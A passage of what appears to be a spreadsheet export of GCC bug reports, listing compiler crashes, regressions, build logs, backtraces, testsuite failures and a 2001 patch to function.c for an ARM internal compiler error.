Configured with: /var/tmp/portage/sys-devel/gcc-4.3.3-r1/work/gcc-4.3.3/configure --prefix=/usr --bindir=/usr/x86_64-pc-linux-gnu/gcc-bin/4.3.3 --includedir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.3.3/include --datadir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.3.3 --mandir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.3.3/man --infodir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.3.3/info --with-gxx-include-dir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.3.3/include/g++-v4 --host=x86_64-pc-linux-gnu --build=x86_64-pc-linux-gnu --disable-altivec --disable-fixed-point --enable-nls --without-included-gettext --with-system-zlib --disable-checking --disable-werror --enable-secureplt --enable-multilib --enable-libmudflap --disable-libssp --enable-libgomp --enable-cld --disable-libgcj --enable-languages=cc++treelang --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu 
Thread model: posix
glibc-2.8_p20080602-r1
Intel-R-_Xeon-R-_CPU_E5420_@_2.50GHz
binutils:  2.18  it add relro as default
The file is compile with CFLAGS -fPIE and LDFLAGS -pie -z now</t>
  </si>
  <si>
    <t>zorry</t>
  </si>
  <si>
    <t>GCC-19525</t>
  </si>
  <si>
    <t>[4.0 Regression] In-build-directory multilib testing broken</t>
  </si>
  <si>
    <t>The new flat layout of the multilibed libgcc_s shared library in the build tree
has broken in-tree multilib testing on IRIX and Solaris because there are now
multiple shared objects with the same soname in the same directory.
Richard Sandiford's analysis for IRIX and plausible kludge:
http://gcc.gnu.org/ml/gcc-patches/2005-01/msg00437.html
The same analysis holds for SPARC/Solaris with the 32-bit compiler:
lrwxrwxrwx       13 Jan 19 01:13 libgcc_s.so -&gt; libgcc_s.so.1
-rwxrwxr-x   138743 Jan 19 01:13 libgcc_s.so.1
-rwxrwxr-x   138743 Jan 19 01:12 libgcc_s.so.1.backup
lrwxrwxrwx       13 Jan 19 01:13 libgcc_s_sparcv9.so -&gt; libgcc_s_sparcv9.so.1
-rwxrwxr-x   196553 Jan 19 01:13 libgcc_s_sparcv9.so.1
-rwxrwxr-x   196553 Jan 19 01:12 libgcc_s_sparcv9.so.1.backup
and the 64-bit compiler:
lrwxrwxrwx       13 Jan 19 01:10 libgcc_s.so -&gt; libgcc_s.so.1
-rwxrwxr-x   262624 Jan 19 01:10 libgcc_s.so.1
-rwxrwxr-x   262624 Jan 19 01:09 libgcc_s.so.1.backup
lrwxrwxrwx       21 Jan 19 01:10 libgcc_s_sparcv7.so -&gt; libgcc_s_sparcv7.so.1
-rwxrwxr-x   191368 Jan 19 01:10 libgcc_s_sparcv7.so.1
-rwxrwxr-x   191368 Jan 19 01:10 libgcc_s_sparcv7.so.1.backup</t>
  </si>
  <si>
    <t>GCC-63888</t>
  </si>
  <si>
    <t>[5 Regression] bootstrap failed when configured with -with-build-config=bootstrap-asan --disable-werror</t>
  </si>
  <si>
    <t>On Linux/x86-64 r217602 gave
build/genmddeps /export/gnu/import/git/sources/gcc/gcc/common.md /export/gnu/import/git/sources/gcc/gcc/config/i386/i386.md &gt; tmp-mddeps
build/genmodes -h &gt; tmp-modes.h
=================================================================
==31507==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 40 byte(s) in 1 object(s) allocated from:
    #0 0x47b5da in __interceptor_malloc /export/gnu/import/git/sources/gcc/libsanitizer/asan/asan_malloc_linux.cc:38
    #1 0x4b42d7 in xmalloc /export/gnu/import/git/sources/gcc/libiberty/xmalloc.c:147
SUMMARY: AddressSanitizer: 40 byte(s) leaked in 1 allocation(s).
make[5]: *** [s-mddeps] Error 23
There are some global string variables initialized with
Breakpoint 5 xmalloc (size=size@entry=40)
    at /export/gnu/import/git/sources/gcc/libiberty/xmalloc.c:146
146	    size = 1
(gdb) bt
#0  xmalloc (size=size@entry=40)
    at /export/gnu/import/git/sources/gcc/libiberty/xmalloc.c:146
#1  0x00000000004b43d1 in xstrndup (
    s=0x7fffffffe18a /export/gnu/import/git/sources/gcc/gcc/common.md 
    n=)
    at /export/gnu/import/git/sources/gcc/libiberty/xstrndup.c:56
#2  0x00000000004aff9e in handle_toplevel_file (
    handle_directive=handle_directive@entry=0x0)
    at /export/gnu/import/git/sources/gcc/gcc/read-md.c:1008
#3  0x00000000004b0672 in read_md_files (argc= 
    argv= parse_opt=parse_opt@entry=0x0 
    handle_directive=handle_directive@entry=0x0)
    at /export/gnu/import/git/sources/gcc/gcc/read-md.c:1138
#4  0x00000000004059d1 in main (argc= argv=)
    at /export/gnu/import/git/sources/gcc/gcc/genmddeps.c:50
(gdb) c
They aren't freed before exit and are detected as memory leaks.
How can they be suppressed?</t>
  </si>
  <si>
    <t>GCC-67159</t>
  </si>
  <si>
    <t>[c++concepts] Segfault while diagnosing constraint violation</t>
  </si>
  <si>
    <t>Created attachment 36149
Preprocessed test case
r226725 crashes while diagnosing a constraint violation in this correct program (pre-processed test case attached):
#include 
template 
concept bool R = requires (T&amp; t) {
  { t.begin() } -&gt; stl2::Iterator
  { t.end() } -&gt; stl2::Sentinel
}
struct foo {
  int* begin()
  int* end()
}
R{T}
constexpr bool f() { return true }
static_assert(f())
resulting in:
~/concept-gcc-r226725/bin/g++ -std=gnu++1z foo.i -c
foo.cpp:17:22: error: cannot call function â€˜constexpr bool f() [with T = foo]â€™
 static_assert(f())
                      ^
foo.cpp:15:16: note:   constraints not satisfied
 constexpr bool f() { return true }
                ^
â€˜
Segmentation fault
 static_assert(f())
                      ^
0xc9055f crash_signal
	../../gcc/toplev.c:352
0xf0f506 contains_struct_check(tree_node const* tree_node_structure_enum char const* int char const*)
	../../gcc/tree.h:3227
0xf0f506 int_cst_value(tree_node const*)
	../../gcc/tree.c:10982
0x6d03c4 get_non_default_template_args_count
	../../gcc/cp/error.c:202
0x6da0b1 dump_template_argument_list
	../../gcc/cp/error.c:211
0x6d52bd dump_decl
	../../gcc/cp/error.c:1215
0x6dae15 expr_to_string
	../../gcc/cp/error.c:2954
0x6dea54 cp_printer
	../../gcc/cp/error.c:3530
0x13a309a pp_format(pretty_printer* text_info*)
	../../gcc/pretty-print.c:612
0x13a0573 diagnostic_report_diagnostic(diagnostic_context* diagnostic_info*)
	../../gcc/diagnostic.c:915
0x13a09d1 inform(unsigned int char const* ...)
	../../gcc/diagnostic.c:1044
0x738a81 cp_build_function_call_vec(tree_node* vec** int)
	../../gcc/cp/typeck.c:3492
0x5f1e29 build_new_function_call(tree_node* vec** bool int)
	../../gcc/cp/call.c:4090
0x77b850 finish_call_expr(tree_node* vec** bool bool int)
	../../gcc/cp/semantics.c:2391
0x6fa019 cp_parser_postfix_expression
	../../gcc/cp/parser.c:6419
0x6fe92a cp_parser_unary_expression
	../../gcc/cp/parser.c:7486
0x6ff53f cp_parser_binary_expression
	../../gcc/cp/parser.c:8223
0x6ffc9f cp_parser_assignment_expression
	../../gcc/cp/parser.c:8481
0x700115 cp_parser_constant_expression
	../../gcc/cp/parser.c:8727
0x702a94 cp_parser_static_assert
	../../gcc/cp/parser.c:12296
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-453</t>
  </si>
  <si>
    <t>[i386-&gt;mingw32] ice attribute dllimport</t>
  </si>
  <si>
    <t>StartModule.cpp: In function `LONG sfx_main(ILoader *)':
StartModule.cpp:45: Internal compiler error in `rest_of_compilation' at toplev.c:4405
Please submit a full bug report.
See  for instructions.
Release:
gcc-2.95.2 as i386-mingw32
Environment:
cross compiling from FreeBSD 3.3-RELEASE
How-To-Repeat:
bzip2 -d StartModule.ii.bz2
gcc -c StartModule.ii</t>
  </si>
  <si>
    <t>eaj</t>
  </si>
  <si>
    <t>GCC-41914</t>
  </si>
  <si>
    <t>/home/dave/opt/gnu/bin/ld: cannot find -lm</t>
  </si>
  <si>
    <t>Executing on host: /home/dave/gnu/gcc-4.5/objdir/gcc/xgcc -B/home/dave/gnu/gcc-4
.5/objdir/gcc/  -flto -r -nostdlib  -c  -o c_lto_20081120-1_1.o /home/dave/gnu/g
cc-4.5/gcc/gcc/testsuite/gcc.dg/lto/20081120-1_1.c    (timeout = 300)
PASS: gcc.dg/lto/20081120-1 c_lto_20081120-1_1.o assemble -flto -r -nostdlib
Executing on host: /home/dave/gnu/gcc-4.5/objdir/gcc/xgcc -B/home/dave/gnu/gcc-4
.5/objdir/gcc/ c_lto_20081120-1_0.o c_lto_20081120-1_1.o  -flto -r -nostdlib   -
lm   -o gcc-dg-lto-20081120-1-01    (timeout = 300)
/home/dave/opt/gnu/bin/ld: cannot find -lm
collect2: ld returned 1 exit status
compiler exited with status 1
output is:
/home/dave/opt/gnu/bin/ld: cannot find -lm
collect2: ld returned 1 exit status
FAIL: gcc.dg/lto/20081120-1 c_lto_20081120-1_0.o-c_lto_20081120-1_1.o link</t>
  </si>
  <si>
    <t>GCC-27865</t>
  </si>
  <si>
    <t>[4.2 Regression] tree check failure building FreePOOMA</t>
  </si>
  <si>
    <t>FreePOOMA 2.4.1 fails to build on powerpc-linux with beginning with this patch:
    http://gcc.gnu.org/viewcvs?view=rev&amp;rev=114057
    r114057 | rakdver | 2006-05-24 22:55:15 +0000 (Wed 24 May 2006)
Output with a minimized testcase:
elm3b145% /opt/gcc-nightly/trunk/bin/g++ -c -O2 poomabug.cc
poomabug.cc: In constructor â€˜GLD::GLD(const II&amp; const PP&amp; const CM&amp;) [with PP = GP ()() int Dim = 2]â€™:
poomabug.cc:117: internal compiler error: tree check: expected integer_type or enumeral_type or boolean_type or real_type have pointer_type in adjust_range_with_scev at tree-vrp.c:2079
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-56971</t>
  </si>
  <si>
    <t>[4.9 Regression] GCC claims a friend function to be overloaded but it isn't</t>
  </si>
  <si>
    <t>template 
class rp {
}
template  class P&gt;
struct b {
    template  class FriendP&gt;
    friend void f(b from)
}
template  class P&gt;
void f(b from) {
}
int main() {
    b v
    f(v)
    return 0
}
-----
&gt; gcc map.cpp
main.cpp: In function 'int main()':
main.cpp:17:13: error: call of overloaded 'f(b&amp;)' is ambiguous
     f(v)
             ^
main.cpp:17:13: note: candidates are:
main.cpp:12:6: note: void f(b) [with  = int P = rp]
 void f(b from) {
      ^
main.cpp:8:17: note: void f(b) [with  = int FriendP = rp P = rp]
     friend void f(b from)
                 ^
-----
I can't see an overload here.</t>
  </si>
  <si>
    <t>henning</t>
  </si>
  <si>
    <t>GCC-35483</t>
  </si>
  <si>
    <t>GCC on AIX doesn't support dollar in symbols name.</t>
  </si>
  <si>
    <t>When compiling libjava on AIX 6.1 gcc generates to the assembler symbols with dollar inside.
But IBM as is not able to manage dollar in symbol names so the compilation fails.</t>
  </si>
  <si>
    <t>Laurent.Vivier</t>
  </si>
  <si>
    <t>GCC-79353</t>
  </si>
  <si>
    <t>[7 regression] ICE in curr_insn_transform at lra-constraints.c:3773</t>
  </si>
  <si>
    <t>Trying to build gcc-7 (snapshot 20170128) on Debian sparc64 fails with:
libtool: compile:  /&gt;/build/./gcc/xgcc -B/&gt;/build/./gcc/ -B/usr/sparc64-linux-gnu/bin/ -B/usr/sparc64-linux-gnu/lib/ -isystem /usr/sparc64-linux-gnu/include -isystem /usr/sparc64-linux-gnu/sys-include -isystem /&gt;/build/sys-include -m32 -DHAVE_CONFIG_H -I. -I../../../../src/libgo -I ../../../../src/libgo/runtime -I../../../../src/libgo/../libffi/include -I../libffi/include -pthread -fexceptions -fnon-call-exceptions -fplan9-extensions -fno-stack-protector -Wall -Wextra -Wwrite-strings -Wcast-qual -D_GNU_SOURCE -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -I ../../../../src/libgo/../libgcc -I ../../../../src/libgo/../libbacktrace -I ../../../gcc/include -g -O2 -m32 -MT thread-linux.lo -MD -MP -MF .deps/thread-linux.Tpo -c ../../../../src/libgo/runtime/thread-linux.c -o thread-linux.o &gt;/dev/null 2&gt;&amp;1
/bin/bash ./libtool --tag=CC   --mode=compile /&gt;/build/./gcc/xgcc -B/&gt;/build/./gcc/ -B/usr/sparc64-linux-gnu/bin/ -B/usr/sparc64-linux-gnu/lib/ -isystem /usr/sparc64-linux-gnu/include -isystem /usr/sparc64-linux-gnu/sys-include -isystem /&gt;/build/sys-include  -m32 -DHAVE_CONFIG_H -I. -I../../../../src/libgo  -I ../../../../src/libgo/runtime -I../../../../src/libgo/../libffi/include -I../libffi/include -pthread  -fexceptions -fnon-call-exceptions -fplan9-extensions -fno-stack-protector  -Wall -Wextra -Wwrite-strings -Wcast-qual    -D_GNU_SOURCE -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -I ../../../../src/libgo/../libgcc -I ../../../../src/libgo/../libbacktrace -I ../../../gcc/include -g -O2  -m32 -c -o syscall/errno.lo ../../../../src/libgo/go/syscall/errno.c
/bin/bash ./libtool --tag=CC   --mode=compile /&gt;/build/./gcc/xgcc -B/&gt;/build/./gcc/ -B/usr/sparc64-linux-gnu/bin/ -B/usr/sparc64-linux-gnu/lib/ -isystem /usr/sparc64-linux-gnu/include -isystem /usr/sparc64-linux-gnu/sys-include -isystem /&gt;/build/sys-include  -m32 -DHAVE_CONFIG_H -I. -I../../../../src/libgo  -I ../../../../src/libgo/runtime -I../../../../src/libgo/../libffi/include -I../libffi/include -pthread  -fexceptions -fnon-call-exceptions -fplan9-extensions -fno-stack-protector  -Wall -Wextra -Wwrite-strings -Wcast-qual    -D_GNU_SOURCE -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -I ../../../../src/libgo/../libgcc -I ../../../../src/libgo/../libbacktrace -I ../../../gcc/include -g -O2  -m32 -c -o syscall/signame.lo ../../../../src/libgo/go/syscall/signame.c
../../../../src/libgo/runtime/parfor.c: In function 'runtime_parfordo':
../../../../src/libgo/runtime/parfor.c:194:1: error: unable to generate reloads for:
 }
 ^
(insn 260 259 261 29 (set (mem/v:DI (reg/v/f:SI 157 [ me ]) [-1  S8 A64])
        (unspec:DI [
                (mem/c:DI (plus:SI (reg/f:SI 101 %sfp)
                        (const_int -8 [0xfffffffffffffff8])) [14 %sfp+-8 S8 A64])
            ] UNSPEC_ATOMIC)) ../../../../src/libgo/runtime/parfor.c:157 796 {atomic_storedi_1}
     (nil))
../../../../src/libgo/runtime/parfor.c:194:1: internal compiler error: in curr_insn_transform at lra-constraints.c:3773
Currently don't have the preprocessed as this was a build on a buildd. But I can do a manual build easily and provide the preprocessed source if necessary.</t>
  </si>
  <si>
    <t>glaubitz</t>
  </si>
  <si>
    <t>GCC-44697</t>
  </si>
  <si>
    <t>I/O testsuite failures: \r\n vs \n -  gfortran.dg/ftell_3.f90</t>
  </si>
  <si>
    <t>As reported by Kai Tietz the testsuite fails under MinGW64 due to the \r\n vs. \n line breaks:
Possible patch for ftell_3.f90 (created for PR 43605):
Index: ftell_3.f90
===================================================================
--- ftell_3.f90 (revision 161500)
+++ ftell_3.f90 (working copy)
@@ -153 +154 @@ program ftell_3
   call ftell(10 i)
-  if(i /= 7) then
+! Expected: On '\n' systems: 7 on \r\n systems: 8
+  if(i /= 7 .and. i /= 8) then
      call abort()
@@ -233 +244 @@ program ftell_3
   call ftell(10i)
-  if (i /= 11) then
+! Expected: On '\n' systems: 11 on \r\n systems: 13
+  if (i /= 11 .and. i /= 13) then
      call abort()</t>
  </si>
  <si>
    <t>GCC-28573</t>
  </si>
  <si>
    <t>[4.1 Regression] incorrectly allowing non-constant expression to offsetof()</t>
  </si>
  <si>
    <t>The following code incorrectly compiles and worse returns incorrect result.
on i686-pc-linux-gnu both 4.1.0 and 4.1.1
-- start snip
#include 
// (incomplete) template class that encapsulates an array of chars
template class CharArray
{
public:
   char d[i]
   char&amp; operator [] ( int indx )
   {
      return d[indx]
   }
}
struct Foo
{
   int i
   CharArray caCharArray
}
int main( int argc char* argv[] )
{
   Foo foo
   int i
// Shouldn't compile and worse results in incorrect offset.
   i = offsetof(Foo caCharArray[0])
}
-- end snip
variables as an array index correctly give an error but unfortunatly not everything that looks like an constant array index is.</t>
  </si>
  <si>
    <t>karl.corbin</t>
  </si>
  <si>
    <t>GCC-45907</t>
  </si>
  <si>
    <t>[4.6 Regression] Revision 164995 failed gcc.dg/torture/fp-int-convert-*.c</t>
  </si>
  <si>
    <t>On Linux/x86 revision 164995:
http://gcc.gnu.org/ml/gcc-cvs/2010-10/msg00177.html
caused:
FAIL: gcc.dg/torture/fp-int-convert-double.c  -O2 -fwhopr  (internal compiler error)
FAIL: gcc.dg/torture/fp-int-convert-double.c  -O2 -fwhopr  (test for excess errors)
FAIL: gcc.dg/torture/fp-int-convert-float.c  -O2 -fwhopr  (internal compiler error)
FAIL: gcc.dg/torture/fp-int-convert-float.c  -O2 -fwhopr  (test for excess errors)
FAIL: gcc.dg/torture/fp-int-convert-float128.c  -O2 -fwhopr  (internal compiler error)
FAIL: gcc.dg/torture/fp-int-convert-float128.c  -O2 -fwhopr  (test for excess errors)
FAIL: gcc.dg/torture/fp-int-convert-float80.c  -O2 -fwhopr  (internal compiler error)
FAIL: gcc.dg/torture/fp-int-convert-float80.c  -O2 -fwhopr  (test for excess errors)
FAIL: gcc.dg/torture/fp-int-convert-long-double.c  -O2 -fwhopr  (internal compiler error)
FAIL: gcc.dg/torture/fp-int-convert-long-double.c  -O2 -fwhopr  (test for excess errors)
FAIL: gcc.dg/torture/fp-int-convert-timode.c  -O2 -fwhopr  (internal compiler error)
FAIL: gcc.dg/torture/fp-int-convert-timode.c  -O2 -fwhopr  (test for excess errors)</t>
  </si>
  <si>
    <t>GCC-64115</t>
  </si>
  <si>
    <t>[4.9/5 Regression] ICE: : in rs6000_delegitimize_address at config/rs6000/rs6000.c:7051</t>
  </si>
  <si>
    <t>trippels@gcc2-power8 linux-3.17.2 % cat radio.i
void (*a)()
void b43legacy_synth_pu_workaround ()
int
channel2freq_bg (int p1)
{
  static int b[] = {}
  if (__builtin_expect (p1 0))
    return b[p1]
  return 0
}
void
b43legacy_radio_selectchannel (int p1)
{
  int c
  b43legacy_synth_pu_workaround ()
  c = channel2freq_bg (p1)
  int d = c
  a (d)
  if (p1)
    b43legacy_synth_pu_workaround ()
}
trippels@gcc2-power8 linux-3.17.2 % gcc -g -O2 -fprofile-arcs -c radio.i
(unspec:DI [
        (symbol_ref:DI (*.LANCHOR1) [flags 0x182])
        (mem/v/c:DI (plus:DI (reg/f:DI 67 ap)
                (const_int -88 [0xffffffffffffffa8])) [5  S8 A8])
    ] UNSPEC_TOCREL)
radio.i: In function â€˜b43legacy_radio_selectchannelâ€™:
radio.i:21:1: internal compiler error: in rs6000_delegitimize_address at config/rs6000/rs6000.c:7051
 }
 ^
0x10b2e193 rs6000_delegitimize_address
        ../../gcc/gcc/config/rs6000/rs6000.c:7051
0x103b01f7 mem_loc_descriptor(rtx_def* machine_mode machine_mode var_init_status)
        ../../gcc/gcc/dwarf2out.c:12402
0x103b11f7 mem_loc_descriptor(rtx_def* machine_mode machine_mode var_init_status)
        ../../gcc/gcc/dwarf2out.c:12766
0x103baa77 loc_descriptor
        ../../gcc/gcc/dwarf2out.c:13444
0x103baabb loc_descriptor
        ../../gcc/gcc/dwarf2out.c:13471
0x103bb17b dw_loc_list_1
        ../../gcc/gcc/dwarf2out.c:13748
0x103b605b dw_loc_list
        ../../gcc/gcc/dwarf2out.c:14018
0x103b605b loc_list_from_tree
        ../../gcc/gcc/dwarf2out.c:14403
0x103bd7fb add_location_or_const_value_attribute
        ../../gcc/gcc/dwarf2out.c:15908
0x103a227b gen_variable_die
        ../../gcc/gcc/dwarf2out.c:19102
0x103a4993 gen_decl_die
        ../../gcc/gcc/dwarf2out.c:20828
0x103c0d83 decls_for_scope
        ../../gcc/gcc/dwarf2out.c:20368
0x1039e4eb gen_subprogram_die
        ../../gcc/gcc/dwarf2out.c:18694
0x103a4747 gen_decl_die
        ../../gcc/gcc/dwarf2out.c:20761
0x103a62b3 dwarf2out_function_decl
        ../../gcc/gcc/dwarf2out.c:21202
0x1042d1f7 rest_of_handle_final
        ../../gcc/gcc/final.c:4508
0x1042d1f7 execute
        ../../gcc/gcc/final.c:4550
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-9026</t>
  </si>
  <si>
    <t>[win32] libjava confuses Eclipse SWT (os.arch)</t>
  </si>
  <si>
    <t>Compile an Eclipse SWT app with with the -Os option which dramatically reduces size of the compressed executable(i.e. download size reduced with 30%).
Eclipse is trying to figure out which native .dll to load and it builds the name based upon various environment variables such as os.arch and os.name. See exception/failure below.
Perhaps this is related to os.arch being set to i586 instead of x86 under Windows?
os.name=Windows 2000  os.arch=i586
Exception in thread main java.lang.UnsatisfiedLinkError: swt-unknown-2052: file not found
Release:
gcj 3.2 mingw
Environment:
Reading specs from c:/mingw/bin/../lib/gcc-lib/mingw32/3.2/specs
Reading specs from c:/mingw/bin/../lib/gcc-lib/mingw32/3.2/../../../libgcj.spec
rename spec lib to liborig
Configured with: /extra/src/gcc/gcc-3.2/configure --prefix=/extra/wingcc --build
=i686-pc-linux-gnu --host=mingw32 --target=mingw32 --enable-languages=cc++java
 --with-gcc --with-gnu-as --with-gnu-ld --with-as=/extra/xgcc/bin/mingw32-as --w
ith-ld=/extra/xgcc/bin/mingw32-ld --enable-threads=win32 --disable-nls --disable
-win32-registry --disable-shared --disable-debug --disable-multilib --without-ne
wlib --enable-libgcj --disable-java-awt --without-x --enable-java-gc=boehm --dis
able-libgcj-debug --enable-interpreter --enable-hash-synchronization
Thread model: win32
gcc version 3.2 (mingw special 20020817-1)</t>
  </si>
  <si>
    <t>GCC-44513</t>
  </si>
  <si>
    <t>improve column number and text of format warnings</t>
  </si>
  <si>
    <t>Testcase:
/* { dg-do compile } */
/* { dg-options -std=iso9899:1990 -pedantic -Wformat } */
#include format.h
void
foo (int i)
{
 printf (%d%d i) 
}
gcc-4.6:
/home/manuel/test/src/gcc/testsuite/gcc.dg/format/clang-1.c: In function 'foo':
/home/manuel/test/src/gcc/testsuite/gcc.dg/format/clang-1.c:9:3: warning: too few arguments for format [-Wformat]
clang prints:
warning: '.*' specified field precision is missing a matching 'int' argument
and the column number points to the extra %d.</t>
  </si>
  <si>
    <t>GCC-40830</t>
  </si>
  <si>
    <t>gcc.dg/vect/vect-pre-interact.c doesn't work on Linux/ia32</t>
  </si>
  <si>
    <t>On Linux/ia32 revision  149946 gave:
AIL: gcc.dg/vect/vect-pre-interact.c scan-tree-dump-times vect vectorized 1 loops 1</t>
  </si>
  <si>
    <t>GCC-46335</t>
  </si>
  <si>
    <t>[C++0X] [4.6 Regression] ICE: in gimple_add_tmp_var at gimplify.c:701</t>
  </si>
  <si>
    <t>The following code compiles fine in C++03 but not in C++0X mode. The code looks vaguely similar to that of PR c++/46129 but the effects are different.
struct T { }
struct A {
	A(const T &amp;tr =T()) {}
}
struct B {
	A k
}
B kk_
A fk_
bug.cc: In constructor â€˜B::B()â€™:
bug.cc:5:9: internal compiler error: in gimple_add_tmp_var at gimplify.c:701</t>
  </si>
  <si>
    <t>GCC-10387</t>
  </si>
  <si>
    <t>QT compile error - Segmentation Fault</t>
  </si>
  <si>
    <t>Segfault during compile of QT-X11 and QT (when they are dependencies for other things I am trying to emerge (portage gentoo))
Release:
gcc version 3.2.2
Environment:
Linux emanuel 2.4.20-openmosix-r2 #4 Thu Apr 10 19:25:00 CEST 2003 i686 AMD Duron(tm) Processor AuthenticAMD GNU/Linux
How-To-Repeat:
emerge x11-libs</t>
  </si>
  <si>
    <t>gccreport</t>
  </si>
  <si>
    <t>GCC-60765</t>
  </si>
  <si>
    <t>Function attributes ignored for pointer-to-member-function parameters</t>
  </si>
  <si>
    <t>$ cat this.cc
struct Foo
void foo (int
$ g++ this.cc -c
this.cc:4:55: warning: â€˜returns_nonnullâ€™ attribute directive ignored [-Wattributes]
 foo (int
                                                       ^</t>
  </si>
  <si>
    <t>patrick</t>
  </si>
  <si>
    <t>GCC-2483</t>
  </si>
  <si>
    <t>Re: c/2404: arm-linux-gcc ice</t>
  </si>
  <si>
    <t xml:space="preserve"> On 27 Mar 2001 bkohlen@intrinsyc.com wrote:
 &gt; gcc cross compiler for arm with fairly standard configure
 &gt; flags. used in combination with glibc-2.1.3 and binutils-2.10.
 &gt; I was compiling xfree86 for arm when error occured.
 &gt; &gt;Description:
 &gt; When installing xfree86 (on my pc so that I can package it
 &gt; for arm) it compiles shadow.c and I get the following error:
 &gt;
 &gt; shadow.c: In function `shadowImageGlyphBlt':
 &gt; shadow.c:1173: Internal compiler error in `purge_addressof_1' at function.c:3183
 &gt; Please submit a full bug report.
 &gt; See  for instructions.
 Fixed with the following patch on the 2.95 branch.  See also the original
 submission
   http://gcc.gnu.org/ml/gcc-patches/1999-11/msg00218.html
 Bernd
 Index: ChangeLog
 ===================================================================
 RCS file: /cvs/gcc/egcs/gcc/ChangeLogv
 retrieving revision 1.3667.4.352
 diff -u -p -r1.3667.4.352 ChangeLog
 --- ChangeLog	2001/04/03 14:46:04	1.3667.4.352
 +++ ChangeLog	2001/04/04 13:04:35
 @@ -13 +114 @@
 +2001-04-04  Bernd Schmidt  
 +
 +	Fri Nov  5 10:07:25 1999  Nick Clifton  
 +	* function.c (is_addressof): New function.  Returns true if
 +	the given piece of RTL is an ADDRESSOF.
 +	(purge_addressof_1): Make boolean.  Return false if the
 +	ADDRESSOFs could not be purged.
 +	(purge_addressof): If ADDRESSOFs could not be purged from the
 +	notes attached to an insn remove the offending note(s)
 +	unless they are attached to a libcall.
 +
  2001-04-03  Bernd Schmidt  
  	2001-03-16  Jakub Jelinek  
 Index: function.c
 ===================================================================
 RCS file: /cvs/gcc/egcs/gcc/function.cv
 retrieving revision 1.90.4.6
 diff -u -p -r1.90.4.6 function.c
 --- function.c	2001/01/25 14:03:15	1.90.4.6
 +++ function.c	2001/04/04 13:04:36
 @@ -5138 +5139 @@ static int *record_insns	PROTO((rtx))
  static int contains		PROTO((rtx int *))
  #endif /* HAVE_prologue || HAVE_epilogue */
  static void put_addressof_into_stack PROTO((rtx struct hash_table *))
 -static void purge_addressof_1	PROTO((rtx * rtx int int
 +static boolean purge_addressof_1 PROTO((rtx * rtx int int
  				       struct hash_table *))
 +static int is_addressof		PROTO ((rtx * void *))
  static struct hash_entry *insns_for_mem_newfunc PROTO((struct hash_entry *
  						       struct hash_table *
  						       hash_table_key))
 @@ -30559 +305610 @@ static rtx purge_addressof_replacements
  /* Helper function for purge_addressof.  See if the rtx expression at *LOC
     in INSN needs to be changed.  If FORCE always put any ADDRESSOFs into
 -   the stack.  */
 +   the stack.  If the function returns FALSE then the replacement could not
 +   be made.  */
 -static void
 +static boolean
  purge_addressof_1 (loc insn force store ht)
       rtx *loc
       rtx insn
 @@ -306813 +307014 @@ purge_addressof_1 (loc insn force sto
    RTX_CODE code
    int i j
    char *fmt
 +  boolean result = true
    /* Re-start here to avoid recursion in common cases.  */
   restart:
    x = *loc
    if (x == 0)
 -    return
 +    return true
    code = GET_CODE (x)
 @@ -30877 +30907 @@ purge_addressof_1 (loc insn force sto
        if (validate_change (insn loc sub 0)
  	  || validate_replace_rtx (x sub insn))
 -	return
 +	return true
        start_sequence ()
        sub = force_operand (sub NULL_RTX)
 @@ -30987 +31017 @@ purge_addressof_1 (loc insn force sto
        insns = gen_sequence ()
        end_sequence ()
        emit_insn_before (insns insn)
 -      return
 +      return true
      }
    else if (code == MEM &amp;&amp; GET_CODE (XEXP (x 0)) == ADDRESSOF &amp;&amp; ! force)
      {
 @@ -31177 +31207 @@ purge_addressof_1 (loc insn force sto
  	  &amp;&amp; (MEM_VOLATILE_P (x) || GET_MODE (x) == BLKmode))
  	{
  	  put_addressof_into_stack (XEXP (x 0) ht)
 -	  return
 +	  return true
  	}
        else if (GET_CODE (sub) == REG &amp;&amp; GET_MODE (x) != GET_MODE (sub))
  	{
 @@ -31367 +31397 @@ purge_addressof_1 (loc insn force sto
  		if (rtx_equal_p (x XEXP (tem 0)))
  		  {
  		    *loc = XEXP (XEXP (tem 1) 0)
 -		    return
 +		    return true
  		  }
  	      /* See comment for purge_addressof_replacements. */
 @@ -317611 +317917 @@ purge_addressof_1 (loc insn force sto
  		      z = gen_lowpart (GET_MODE (x) z)
  		    *loc = z
 -		    return
 +		    return true
  		  }
 -	      /* There should always be such a replacement.  */
 -	      abort ()
 +	      /* Sometimes we may not be able to find the replacement.  For
 +		 example when the original insn was a MEM in a wider mode
 +		 and the note is part of a sign extension of a narrowed
 +		 version of that MEM.  Gcc testcase compile/990829-1.c can
 +		 generate an example of this siutation.  Rather than complain
 +		 we return false which will prompt our caller to remove the
 +		 offending note.  */
 +	      return false
  	    }
  	  size_x = GET_MODE_BITSIZE (GET_MODE (x))
 @@ -32667 +32757 @@ purge_addressof_1 (loc insn force sto
  				      purge_bitfield_addressof_replacements))
  	      /* We replaced with a reg -- all done.  */
 -	      return
 +	      return true
  	    }
  	}
        else if (validate_change (insn loc sub 0))
 @@ -328313 +329213 @@ purge_addressof_1 (loc insn force sto
  		if (rtx_equal_p (XEXP (x 0) XEXP (tem 0)))
  		  {
  		    XEXP (XEXP (tem 1) 0) = sub
 -		    return
 +		    return true
  		  }
  	      purge_addressof_replacements
  		= gen_rtx (EXPR_LIST VOIDmode XEXP (x 0)
  			   gen_rtx_EXPR_LIST (VOIDmode sub
  					      purge_addressof_replacements))
 -	      return
 +	      return true
  	    }
  	  goto restart
  	}
 @@ -329913 +330813 @@ purge_addressof_1 (loc insn force sto
    else if (code == ADDRESSOF)
      {
        put_addressof_into_stack (x ht)
 -      return
 +      return true
      }
    else if (code == SET)
      {
